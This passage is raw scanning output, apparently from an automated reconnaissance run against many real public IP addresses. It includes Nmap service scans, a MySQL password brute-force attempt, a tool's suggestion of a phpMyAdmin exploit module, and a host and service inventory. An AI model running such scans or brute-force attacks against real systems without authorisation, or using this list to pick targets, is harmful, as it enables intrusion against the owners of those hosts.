52298 243.71 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
52309 233.90 ms be2317.ccr41.jfk02.atlas.cogentco.com (154.54.30.185)
523110 243.53 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
523211 ... 14
523315 247.24 ms 199.38.245.243
5234################################################################################################################################
5235Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:10 EDT
5236Nmap scan report for 199.38.245.243
5237Host is up (0.25s latency).
5238
5239PORT STATE SERVICE VERSION
5240123/tcp closed ntp
5241123/udp open|filtered ntp
5242Too many fingerprints match this host to give specific OS details
5243Network Distance: 16 hops
5244
5245TRACEROUTE (using port 123/tcp)
5246HOP RTT ADDRESS
52471 134.26 ms 10.203.41.1
52482 ...
52493 134.90 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
52504 134.64 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
52515 140.09 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
52526 162.12 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
52537 167.75 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
52548 234.52 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
52559 242.34 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
525610 237.80 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
525711 ... 15
525816 236.99 ms 199.38.245.243
5259#################################################################################################################################
5260Version: 2.0.0-static
5261OpenSSL 1.1.1e-dev xx XXX xxxx
5262
5263Connected to 199.38.245.243
5264
5265Testing SSL server 199.38.245.243 on port 443 using SNI name 199.38.245.243
5266
5267 SSL/TLS Protocols:
5268SSLv2 disabled
5269SSLv3 disabled
5270TLSv1.0 disabled
5271TLSv1.1 enabled
5272TLSv1.2 enabled
5273TLSv1.3 disabled
5274
5275 TLS Fallback SCSV:
5276Server supports TLS Fallback SCSV
5277
5278 TLS renegotiation:
5279Session renegotiation not supported
5280
5281 TLS Compression:
5282Compression disabled
5283
5284 Heartbleed:
5285TLSv1.2 not vulnerable to heartbleed
5286TLSv1.1 not vulnerable to heartbleed
5287
5288 Supported Server Cipher(s):
5289Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
5290Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
5291Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
5292Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
5293Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
5294Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
5295Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
5296Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
5297Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
5298Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
5299Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
5300Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
5301Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
5302Accepted TLSv1.2 128 bits AES128-GCM-SHA256
5303Accepted TLSv1.2 256 bits AES256-GCM-SHA384
5304Accepted TLSv1.2 128 bits AES128-SHA256
5305Accepted TLSv1.2 256 bits AES256-SHA256
5306Accepted TLSv1.2 128 bits AES128-SHA
5307Accepted TLSv1.2 256 bits AES256-SHA
5308Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
5309Accepted TLSv1.2 256 bits CAMELLIA256-SHA
5310Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
5311Accepted TLSv1.2 128 bits CAMELLIA128-SHA
5312Accepted TLSv1.2 112 bits DES-CBC3-SHA
5313Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
5314Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
5315Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
5316Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
5317Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
5318Accepted TLSv1.1 128 bits AES128-SHA
5319Accepted TLSv1.1 256 bits AES256-SHA
5320Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
5321Accepted TLSv1.1 256 bits CAMELLIA256-SHA
5322Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
5323Accepted TLSv1.1 128 bits CAMELLIA128-SHA
5324Accepted TLSv1.1 112 bits DES-CBC3-SHA
5325
5326 Server Key Exchange Group(s):
5327TLSv1.2 128 bits secp256r1 (NIST P-256)
5328
5329 Server Signature Algorithm(s):
5330TLSv1.2 Server accepts all signature algorithms.
5331
5332 SSL Certificate:
5333Signature Algorithm: sha1WithRSAEncryption
5334RSA Key Strength: 2048
5335
5336Subject: localhost
5337Issuer: localhost
5338
5339Not valid before: Jun 4 16:48:56 2019 GMT
5340Not valid after: Oct 19 16:48:56 2046 GMT
5341#################################################################################################################################
5342Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:14 EDT
5343NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
5344NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
5345NSE: [mysql-brute] passwords: Time limit 3m00s exceeded.
5346Nmap scan report for 199.38.245.243
5347Host is up (0.24s latency).
5348
5349PORT STATE SERVICE VERSION
53503306/tcp open mysql MySQL (unauthorized)
5351| mysql-brute:
5352| Accounts: No valid accounts found
5353|_ Statistics: Performed 6811 guesses in 180 seconds, average tps: 37.3
5354|_mysql-empty-password: Host '45.132.192.91' is not allowed to connect to this MySQL server
5355| mysql-enum:
5356| Accounts: No valid accounts found
5357|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
5358|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
5359Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5360Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 3.2 - 4.9 (89%), Linux 3.7 - 3.10 (89%), QNAP QTS 4.0 - 4.2 (89%), ASUS RT-N56U WAP (Linux 3.4) (89%)
5361No exact OS matches for host (test conditions non-ideal).
5362Network Distance: 16 hops
5363
5364TRACEROUTE (using port 3306/tcp)
5365HOP RTT ADDRESS
53661 136.12 ms 10.203.41.1
53672 ...
53683 136.93 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
53694 136.91 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
53705 141.92 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
53716 161.54 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
53727 169.14 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
53738 240.39 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
53749 240.00 ms be2317.ccr41.jfk02.atlas.cogentco.com (154.54.30.185)
537510 238.62 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
537611 244.69 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
537712 ... 15
537816 241.79 ms 199.38.245.243
5379#################################################################################################################################
5380--------------------------------------------------------
5381<<<Yasuo discovered following vulnerable applications>>>
5382--------------------------------------------------------
5383+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
5384| App Name | URL to Application | Potential Exploit | Username | Password |
5385+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
5386| phpMyAdmin | https://199.38.245.243:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
5387+------------+----------------------------------------+--------------------------------------------------+-----------+-----------
5388#################################################################################################################################
5389Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:20 EDT
5390Nmap scan report for 199.38.245.243
5391Host is up (0.24s latency).
5392Not shown: 65521 closed ports
5393PORT STATE SERVICE VERSION
539421/tcp open ftp Pure-FTPd
5395| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
5396| Not valid before: 2019-06-04T16:48:56
5397|_Not valid after: 2046-10-19T16:48:56
5398|_ssl-date: 2020-03-19T01:31:51+00:00; +6m02s from scanner time.
539922/tcp open ssh OpenSSH 5.3 (protocol 2.0)
5400| ssh-hostkey:
5401| 1024 1a:0d:eb:77:2b:24:04:b9:fb:ff:06:3a:d3:de:0b:fc (DSA)
5402|_ 2048 59:7a:97:24:cd:1c:5a:3a:87:31:41:1d:60:aa:27:dc (RSA)
540325/tcp open smtp Exim smtpd 4.92
5404| smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
5405|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
5406| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
5407| Not valid before: 2016-05-13T00:34:32
5408|_Not valid after: 2043-09-28T00:34:32
5409|_ssl-date: 2020-03-19T01:31:50+00:00; +6m01s from scanner time.
541053/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
5411| dns-nsid:
5412|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
541380/tcp open ssl/http Apache/2
5414|_http-server-header: Apache/2
5415|_http-title: Site doesn't have a title (text/html).
5416110/tcp open pop3 Dovecot DirectAdmin pop3d
5417|_pop3-capabilities: STLS RESP-CODES CAPA PIPELINING SASL(PLAIN) USER AUTH-RESP-CODE UIDL TOP
5418| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
5419| Not valid before: 2016-05-13T00:34:32
5420|_Not valid after: 2043-09-28T00:34:32
5421|_ssl-date: 2020-03-19T01:31:49+00:00; +6m01s from scanner time.
5422143/tcp open imap Dovecot imapd
5423|_imap-capabilities: SASL-IR LOGIN-REFERRALS capabilities more have post-login ENABLE AUTH=PLAINA0001 OK Pre-login STARTTLS listed IMAP4rev1 ID LITERAL+ IDLE
5424| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
5425| Not valid before: 2016-05-13T00:34:32
5426|_Not valid after: 2043-09-28T00:34:32
5427|_ssl-date: 2020-03-19T01:31:50+00:00; +6m01s from scanner time.
5428443/tcp open ssl/ssl Apache httpd (SSL-only mode)
5429|_http-server-header: Apache/2
5430|_http-title: 400 Bad Request
5431| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
5432| Not valid before: 2019-06-04T16:48:56
5433|_Not valid after: 2046-10-19T16:48:56
5434|_ssl-date: 2020-03-19T01:31:49+00:00; +6m01s from scanner time.
5435465/tcp open ssl/smtp Exim smtpd 4.92
5436|_smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
5437| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
5438| Not valid before: 2016-05-13T00:34:32
5439|_Not valid after: 2043-09-28T00:34:32
5440|_ssl-date: 2020-03-19T01:31:50+00:00; +6m02s from scanner time.
5441587/tcp open smtp Exim smtpd 4.92
5442| smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
5443|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
5444| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
5445| Not valid before: 2016-05-13T00:34:32
5446|_Not valid after: 2043-09-28T00:34:32
5447|_ssl-date: 2020-03-19T01:31:50+00:00; +6m02s from scanner time.
5448993/tcp open ssl/imap
5449| fingerprint-strings:
5450| NULL:
5451|_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
5452| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
5453| Not valid before: 2016-05-13T00:34:32
5454|_Not valid after: 2043-09-28T00:34:32
5455|_ssl-date: 2020-03-19T01:31:49+00:00; +6m01s from scanner time.
5456995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d
5457| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
5458| Not valid before: 2016-05-13T00:34:32
5459|_Not valid after: 2043-09-28T00:34:32
5460|_ssl-date: 2020-03-19T01:31:49+00:00; +6m01s from scanner time.
54612222/tcp open http DirectAdmin httpd 1.57.1 (Registered to Your Domain Goes Here, LLP)
5462|_http-title: DirectAdmin Login
5463|_http-trane-info: Problem with XML parsing of /evox/about
54643306/tcp open mysql MySQL (unauthorized)
54651 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
5466SF-Port993-TCP:V=7.80%T=SSL%I=7%D=3/18%Time=5E72C9E4%P=x86_64-pc-linux-gnu
5467SF:%r(NULL,6A,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20SASL-IR\x20LOGIN-R
5468SF:EFERRALS\x20ID\x20ENABLE\x20IDLE\x20LITERAL\+\x20AUTH=PLAIN\]\x20Doveco
5469SF:t\x20DA\x20ready\.\r\n");
5470Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%)
5471No exact OS matches for host (test conditions non-ideal).
5472Network Distance: 16 hops
5473Service Info: Host: server.18they.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
5474
5475Host script results:
5476|_clock-skew: mean: 6m01s, deviation: 0s, median: 6m00s
5477
5478TRACEROUTE (using port 554/tcp)
5479HOP RTT ADDRESS
54801 130.10 ms 10.203.41.1
54812 ...
54823 130.88 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
54834 130.79 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
54845 136.35 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
54856 151.74 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
54867 162.92 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
54878 237.79 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
54889 237.83 ms be2317.ccr41.jfk02.atlas.cogentco.com (154.54.30.185)
548910 237.01 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
549011 244.89 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
549112 ... 15
549216 244.84 ms 199.38.245.243
5493#################################################################################################################################
5494Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:26 EDT
5495Nmap scan report for 199.38.245.243
5496Host is up (0.24s latency).
5497
5498PORT STATE SERVICE VERSION
549953/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
550067/tcp closed dhcps
550168/tcp closed dhcpc
550269/tcp closed tftp
550388/tcp closed kerberos-sec
5504123/tcp closed ntp
5505137/tcp closed netbios-ns
5506138/tcp closed netbios-dgm
5507139/tcp closed netbios-ssn
5508161/tcp closed snmp
5509162/tcp closed snmptrap
5510389/tcp closed ldap
5511520/tcp closed efs
55122049/tcp closed nfs
551353/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
5514| dns-nsid:
5515|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
551667/udp open|filtered dhcps
551768/udp open|filtered dhcpc
551869/udp open|filtered tftp
551988/udp open|filtered kerberos-sec
5520123/udp open|filtered ntp
5521137/udp open|filtered netbios-ns
5522138/udp open|filtered netbios-dgm
5523139/udp open|filtered netbios-ssn
5524161/udp open|filtered snmp
5525162/udp open|filtered snmptrap
5526389/udp open|filtered ldap
5527520/udp open|filtered route
55282049/udp open|filtered nfs
5529Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%), Linux 3.7 (89%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (89%)
5530No exact OS matches for host (test conditions non-ideal).
5531Network Distance: 15 hops
5532Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
5533
5534TRACEROUTE (using port 161/tcp)
5535HOP RTT ADDRESS
55361 130.65 ms 10.203.41.1
55372 ...
55383 131.31 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
55394 131.11 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
55405 136.96 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
55416 158.65 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
55427 164.05 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
55438 237.46 ms be12266.ccr42.par01.atlas.cogentco.com (154.54.56.174)
55449 237.00 ms be2490.ccr42.jfk02.atlas.cogentco.com (154.54.42.85)
554510 241.98 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
554611 ... 14
554715 239.59 ms 199.38.245.243
5548#################################################################################################################################
5549Hosts
5550=====
5551
5552address mac name os_name os_flavor os_sp purpose info comments
5553------- --- ---- ------- --------- ----- ------- ---- --------
55543.83.211.23 ec2-3-83-211-23.compute-1.amazonaws.com embedded device
55553.216.98.236 ec2-3-216-98-236.compute-1.amazonaws.com Linux 3.X server
555634.224.171.238 ec2-34-224-171-238.compute-1.amazonaws.com Linux server
555734.236.0.217 ec2-34-236-0-217.compute-1.amazonaws.com Linux 3.X server
555834.253.89.155 ec2-34-253-89-155.eu-west-1.compute.amazonaws.com Linux 4.X server
555937.1.207.121 teens-sins.net 2-Series 3.X device
556043.245.223.4 Linux 2.6.X server
556145.60.47.218 Linux 3.X server
556245.88.202.111 Linux 3.X server
556345.239.108.252 whale.ecohosting.cl Linux 3.X server
556452.1.2.24 ec2-52-1-2-24.compute-1.amazonaws.com Linux server
556552.1.174.10 ec2-52-1-174-10.compute-1.amazonaws.com Linux 3.X server
556652.30.54.73 ec2-52-30-54-73.eu-west-1.compute.amazonaws.com Linux 4.X server
556752.52.234.222 ec2-52-52-234-222.us-west-1.compute.amazonaws.com Unknown device
556854.72.57.25 ec2-54-72-57-25.eu-west-1.compute.amazonaws.com Linux 4.X server
556954.85.59.109 ec2-54-85-59-109.compute-1.amazonaws.com Linux 3.X server
557054.194.134.190 ec2-54-194-134-190.eu-west-1.compute.amazonaws.com Linux 4.X server
557164.69.94.253 Unknown device
557269.163.233.4 ps54052.dreamhostps.com Linux 14.04 server
557374.117.180.192 embedded device
557482.94.222.131 Unknown device
557592.123.250.35 a92-123-250-35.deploy.static.akamaitechnologies.com embedded device
557692.123.250.65 a92-123-250-65.deploy.static.akamaitechnologies.com Linux 3.X server
557794.102.51.111 Linux 2.4.X server
557894.102.51.112 no-reverse-dns-configured.com Linux 2.6.X server
5579104.244.73.40 Unknown device
5580104.244.76.231 Linux 3.X server
5581104.244.77.188 Linux 3.X server
5582104.244.79.89 Linux 3.X server
5583107.180.28.114 ip-107-180-28-114.ip.secureserver.net Unknown device
5584111.90.145.39 web16.support-emilid.com Linux 2.6.X server
5585143.95.110.248 ip-143-95-110-248.iplocal Linux 3.X server
5586149.126.72.220 149.126.72.220.ip.incapdns.net Linux 3.X server
5587151.106.38.107 ns3152160.ip-151-106-38.eu embedded device
5588158.69.13.254 ip254.ip-158-69-13.net 2-Series 2.6.X device
5589162.244.35.13 xnlog.com FreeBSD 7.X device
5590163.247.48.46 Unknown device
5591163.247.127.20 Unknown device
5592163.247.130.114 embedded device
5593163.247.175.176 Unknown device
5594165.22.143.229 Linux 2.6.X server
5595165.227.99.239 Linux 3.X server
5596169.239.218.20 cp10.domains.co.za Linux 2.6.X server
5597173.214.244.169 173.214.244.169.serverel.net Unknown device
5598174.142.53.51 mail.marineland.ca Linux 3.X server
5599186.64.118.40 mail.blue127.dnsmisitio.net embedded device
5600190.98.209.37 static.190.98.209.37.gtdinternet.com Unknown device
5601190.107.177.35 srv25.cpanelhost.cl Linux 2.6.X server
5602190.110.121.175 todofutbol.hn.cl Unknown device
5603190.153.209.187 static.190.153.209.187.gtdinternet.com Unknown device
5604190.153.219.254 mail.evopoli.cl Linux 3.X server
5605192.185.134.58 ns36.accountservergroup.com Linux 3.X server
5606199.38.245.243 embedded device
5607200.2.249.28 Linux 3.X server
5608200.10.251.82 homer.sii.cl Unknown device
5609200.12.19.101 embedded device
5610200.29.0.33 cp33.puntoweb.cl Unknown device
5611200.54.92.108 Linux 9.0 server
5612200.54.230.247 plesk.tdata.cloud Linux 3.X server
5613200.55.198.228 Linux 2.4.X server
5614200.68.30.227 mail.gorecoquimbo.cl Unknown device
5615200.68.34.99 Unknown device
5616200.73.54.34 mail.maxtel.cl Linux 2.6.X server
5617200.91.40.252 200-91-40-252.avz.cl Unknown device
5618200.91.41.5 cruzblanca.cl Unknown device
5619200.126.100.83 toqui.gorearaucania.cl Unknown device
5620201.159.170.136 soloweb.sinc.cl Unknown device
5621204.93.193.141 suzuka.mochahost.com Unknown device
5622206.48.140.40 Unknown device
5623207.246.147.189 2-Series device
5624207.246.147.190 Linux 4.X server
5625207.246.147.247 Linux 4.X server
5626207.246.147.248 Linux 4.X server
5627211.13.196.135 sv3.isle.ne.jp Linux 2.6.X server
5628212.174.0.150 Windows 2012 server
5629216.172.184.117 Linux 3.X server
5630218.45.5.97 www.town.koya.wakayama.jp Linux 2.6.X server
5631#################################################################################################################################
5632Services
5633========
5634
5635host port proto name state info
5636---- ---- ----- ---- ----- ----
56373.83.211.23 53 tcp domain filtered
56383.83.211.23 53 udp domain unknown
56393.83.211.23 67 tcp dhcps filtered
56403.83.211.23 67 udp dhcps unknown
56413.83.211.23 68 tcp dhcpc filtered
56423.83.211.23 68 udp dhcpc unknown
56433.83.211.23 69 tcp tftp filtered
56443.83.211.23 69 udp tftp unknown
56453.83.211.23 80 tcp http open Microsoft IIS httpd 10.0
56463.83.211.23 88 tcp kerberos-sec filtered
56473.83.211.23 88 udp kerberos-sec unknown
56483.83.211.23 123 tcp ntp filtered
56493.83.211.23 123 udp ntp unknown
56503.83.211.23 137 tcp netbios-ns filtered
56513.83.211.23 137 udp netbios-ns unknown
56523.83.211.23 138 tcp netbios-dgm filtered
56533.83.211.23 138 udp netbios-dgm unknown
56543.83.211.23 139 tcp netbios-ssn filtered
56553.83.211.23 139 udp netbios-ssn unknown
56563.83.211.23 161 tcp snmp filtered
56573.83.211.23 161 udp snmp unknown
56583.83.211.23 162 tcp snmptrap filtered
56593.83.211.23 162 udp snmptrap unknown
56603.83.211.23 389 tcp ldap filtered
56613.83.211.23 389 udp ldap unknown
56623.83.211.23 443 tcp ssl/http open Microsoft IIS httpd 10.0
56633.83.211.23 520 tcp efs filtered
56643.83.211.23 520 udp route unknown
56653.83.211.23 2049 tcp nfs filtered
56663.83.211.23 2049 udp nfs unknown
56673.216.98.236 53 tcp domain filtered
56683.216.98.236 53 udp domain unknown
56693.216.98.236 67 tcp dhcps filtered
56703.216.98.236 67 udp dhcps unknown
56713.216.98.236 68 tcp dhcpc filtered
56723.216.98.236 68 udp dhcpc unknown
56733.216.98.236 69 tcp tftp filtered
56743.216.98.236 69 udp tftp unknown
56753.216.98.236 80 tcp http open Microsoft IIS httpd 10.0
56763.216.98.236 88 tcp kerberos-sec filtered
56773.216.98.236 88 udp kerberos-sec unknown
56783.216.98.236 123 tcp ntp filtered
56793.216.98.236 123 udp ntp unknown
56803.216.98.236 137 tcp netbios-ns filtered
56813.216.98.236 137 udp netbios-ns unknown
56823.216.98.236 138 tcp netbios-dgm filtered
56833.216.98.236 138 udp netbios-dgm unknown
56843.216.98.236 139 tcp netbios-ssn filtered
56853.216.98.236 139 udp netbios-ssn unknown
56863.216.98.236 161 tcp snmp filtered
56873.216.98.236 161 udp snmp unknown
56883.216.98.236 162 tcp snmptrap filtered
56893.216.98.236 162 udp snmptrap unknown
56903.216.98.236 389 tcp ldap filtered
56913.216.98.236 389 udp ldap unknown
56923.216.98.236 443 tcp ssl/http open Microsoft IIS httpd 10.0
56933.216.98.236 520 tcp efs filtered
56943.216.98.236 520 udp route unknown
56953.216.98.236 2049 tcp nfs filtered
56963.216.98.236 2049 udp nfs unknown
569734.224.171.238 53 tcp domain filtered
569834.224.171.238 53 udp domain unknown
569934.224.171.238 67 tcp dhcps filtered
570034.224.171.238 67 udp dhcps unknown
570134.224.171.238 68 tcp dhcpc filtered
570234.224.171.238 68 udp dhcpc unknown
570334.224.171.238 69 tcp tftp filtered
570434.224.171.238 69 udp tftp unknown
570534.224.171.238 80 tcp http open Apache httpd 2.4.29 (Ubuntu)
570634.224.171.238 88 tcp kerberos-sec filtered
570734.224.171.238 88 udp kerberos-sec unknown
570834.224.171.238 123 tcp ntp filtered
570934.224.171.238 123 udp ntp unknown
571034.224.171.238 137 tcp netbios-ns filtered
571134.224.171.238 137 udp netbios-ns unknown
571234.224.171.238 138 tcp netbios-dgm filtered
571334.224.171.238 138 udp netbios-dgm unknown
571434.224.171.238 139 tcp netbios-ssn filtered
571534.224.171.238 139 udp netbios-ssn unknown
571634.224.171.238 161 tcp snmp filtered
571734.224.171.238 161 udp snmp unknown
571834.224.171.238 162 tcp snmptrap filtered
571934.224.171.238 162 udp snmptrap unknown
572034.224.171.238 389 tcp ldap filtered
572134.224.171.238 389 udp ldap unknown
572234.224.171.238 443 tcp ssl/http open Apache httpd 2.4.29 (Ubuntu)
572334.224.171.238 520 tcp efs filtered
572434.224.171.238 520 udp route unknown
572534.224.171.238 2049 tcp nfs filtered
572634.224.171.238 2049 udp nfs unknown
572734.236.0.217 53 tcp domain filtered
572834.236.0.217 53 udp domain unknown
572934.236.0.217 67 tcp dhcps filtered
573034.236.0.217 67 udp dhcps unknown
573134.236.0.217 68 tcp dhcpc filtered
573234.236.0.217 68 udp dhcpc unknown
573334.236.0.217 69 tcp tftp filtered
573434.236.0.217 69 udp tftp unknown
573534.236.0.217 80 tcp http open nginx
573634.236.0.217 88 tcp kerberos-sec filtered
573734.236.0.217 88 udp kerberos-sec unknown
573834.236.0.217 123 tcp ntp filtered
573934.236.0.217 123 udp ntp unknown
574034.236.0.217 137 tcp netbios-ns filtered
574134.236.0.217 137 udp netbios-ns unknown
574234.236.0.217 138 tcp netbios-dgm filtered
574334.236.0.217 138 udp netbios-dgm unknown
574434.236.0.217 139 tcp netbios-ssn filtered
574534.236.0.217 139 udp netbios-ssn unknown
574634.236.0.217 161 tcp snmp filtered
574734.236.0.217 161 udp snmp unknown
574834.236.0.217 162 tcp snmptrap filtered
574934.236.0.217 162 udp snmptrap unknown
575034.236.0.217 389 tcp ldap filtered
575134.236.0.217 389 udp ldap unknown
575234.236.0.217 443 tcp ssl/http open nginx
575334.236.0.217 520 tcp efs filtered
575434.236.0.217 520 udp route unknown
575534.236.0.217 2049 tcp nfs filtered
575634.236.0.217 2049 udp nfs unknown
575734.253.89.155 53 tcp domain closed
575834.253.89.155 53 udp domain unknown
575934.253.89.155 67 tcp dhcps closed
576034.253.89.155 67 udp dhcps unknown
576134.253.89.155 68 tcp dhcpc closed
576234.253.89.155 68 udp dhcpc unknown
576334.253.89.155 69 tcp tftp closed
576434.253.89.155 69 udp tftp unknown
576534.253.89.155 80 tcp http open nginx
576634.253.89.155 88 tcp kerberos-sec closed
576734.253.89.155 88 udp kerberos-sec unknown
576834.253.89.155 123 tcp ntp closed
576934.253.89.155 123 udp ntp unknown
577034.253.89.155 137 tcp netbios-ns closed
577134.253.89.155 137 udp netbios-ns unknown
577234.253.89.155 138 tcp netbios-dgm closed
577334.253.89.155 138 udp netbios-dgm unknown
577434.253.89.155 139 tcp netbios-ssn closed
577534.253.89.155 139 udp netbios-ssn unknown
577634.253.89.155 161 tcp snmp closed
577734.253.89.155 161 udp snmp unknown
577834.253.89.155 162 tcp snmptrap closed
577934.253.89.155 162 udp snmptrap unknown
578034.253.89.155 389 tcp ldap closed
578134.253.89.155 389 udp ldap unknown
578234.253.89.155 443 tcp ssl/http open nginx
